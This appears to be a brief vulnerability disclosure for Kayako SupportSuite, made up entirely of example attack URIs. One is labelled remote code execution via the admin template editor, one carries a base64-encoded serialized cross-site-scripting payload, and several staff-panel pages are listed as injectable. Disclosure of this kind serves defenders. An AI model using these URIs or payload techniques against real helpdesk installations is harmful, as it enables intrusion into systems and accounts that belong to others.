Kayako SupportSuite Multiple Vulnerabilities
The following example URIs are available:

Remote code-execution:

http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register

Cross-site scripting:

http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
http://www.example.com/support/staff/index.php?_m=news&_a=managenews
http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories
http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles
http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]
http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking
http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses
http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts
http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters